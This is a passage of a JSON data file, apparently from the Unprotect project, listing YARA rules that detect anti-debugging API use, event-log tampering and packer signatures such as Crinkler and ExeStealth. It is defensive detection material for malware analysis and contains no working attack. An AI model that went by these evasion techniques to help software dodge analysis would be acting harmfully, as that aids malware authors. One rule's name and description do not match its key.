00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 73,
            "key": "yara_detect_closehandle",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_CloseHandle",
            "rule": "rule Detect_CloseHandle: AntiDebug {\r\n    meta: \r\n        description = \"Detect CloseHandle as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtClose\" fullword ascii\r\n        $2 = \"CloseHandle\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
        },
        {
            "id": 111,
            "key": "yara_detect_crinkler",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Crinkler",
            "rule": "rule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 42 00 31 DB 43 EB 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 74,
            "key": "yara_detect_csrgetprocessid",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_CsrGetProcessID",
            "rule": "rule Detect_CsrGetProcessID: AntiDebug {\r\n    meta: \r\n        description = \"Detect CsrGetProcessID as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"CsrGetProcessID\" fullword ascii\r\n        $2 = \"GetModuleHandle\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and 2 of them \r\n}"
        },
        {
            "id": 83,
            "key": "yara_detect_eventlogtampering",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_EventLogTampering",
            "rule": "rule Detect_EventLogTampering: AntiForensic {\r\n    meta: \r\n        description = \"Detect NtLoadDriver and others as anti-forensic\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtLoadDriver \" fullword ascii\r\n        $2 = \"NdrClientCall2\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
        },
        {
            "id": 75,
            "key": "yara_detect_eventpairhandles",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_EventPairHandles",
            "rule": "rule Detect_EventPairHandles: AntiDebug {\r\n    meta: \r\n        description = \"Detect EventPairHandles as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"EventPairHandles\" fullword ascii\r\n        $2 = \"RtlCreateQueryDebugBuffer\" fullword ascii\r\n        $3 = \"RtlQueryProcessHeapInformation\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and 2 of them \r\n}"
        },
        {
            "id": 71,
            "key": "yara_detect_exceptionhandler",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_ExceptionHandler",
            "rule": "rule Detect_SuspendThread: AntiDebug {\r\n    meta: \r\n        description = \"Detect SuspendThread as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"UnhandledExcepFilter\" fullword ascii\r\n        $2 = \"SetUnhandledExceptionFilter\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
        },
        {
            "id": 104,
            "key": "yara_detect_exestealth",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Exestealth",
            "rule": "rule ExeStealth_WebToolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 
45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ExeStealth_WebToolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 82,
            "key": "yara_detect_findwindow",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_FindWindow",
            "rule": "import \"pe\"\r\n\r\nrule Detect_FindWindowA_iat {\r\n\tmeta:\r\n\t\tAuthor = \"http://twitter.com/j0sm1\"\r\n\t\tDescription = \"it's checked if FindWindowA() is imported\"\r\n\t\tDate = \"20/04/2015\"\r\n\t\tReference = \"http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#OllyFindWindow\"\r\n\tstrings:\r\n\t\t$ollydbg = \"OLLYDBG\"\r\n\t\t$windbg = \"WinDbgFrameClass\"\r\n\tcondition:\r\n\t\tpe.imports(\"user32.dll\",\"FindWindowA\") and ($ollydbg or $windbg)\r\n}"
        },
        {
            "id": 68,
            "key": "yara_detect_guardpages",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_GuardPages",
            "rule": "rule Detect_GuardPages: AntiDebug {\r\n    meta: \r\n        description = \"Detect Guard Pages as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"GetSystemInfo\" fullword ascii\r\n        $2 = \"VirtualAlloc\" fullword ascii\r\n        $3 = \"RtlFillMemory\" fullword ascii\r\n        $4 =\"VirtualProtect\" fullword ascii\r\n        $5 =\"VirtualFree\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and 4 of them \r\n}"
        }
    ]
}